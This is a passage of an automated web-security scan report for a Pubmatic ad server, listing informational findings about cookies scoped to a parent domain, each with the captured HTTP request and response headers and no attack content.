Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:10 GMT; path=/
Set-Cookie: pubfreq_27331_22454_319263946=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:10 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

11.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.3321335173677653&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1376
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22455_840239298=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A6%3A17&ranreq=0.5169704589061439&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=5x296&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 1857
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:51 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1788055834=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:51 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:51 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.23497605347074568&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1420040876=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.138. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A44&ranreq=0.5097279618494213&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:18 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:18 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1564617717=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:18 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:18 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.139. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.8495062424335629&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1861
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_22455_875178760=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.140. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A42&ranreq=0.964064912404865&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:16 GMT
Content-Length: 1860
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:16 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1248155553=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:16 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:16 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.141. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.99983213795349&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:58 GMT
Content-Length: 1571
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:58 GMT; path=/
Set-Cookie: pubfreq_27331_23101_978321027=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:58 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.142. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A3&ranreq=0.39337378134950995&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=67673251&rk1=17154153&rk2=1316239503.607&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:38 GMT
Content-Length: 1851
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:37 GMT; path=/
Set-Cookie: _curtime=1316221418; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:13:38 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1229426233=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:38 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

11.143. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A35&ranreq=0.6366450756322592&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
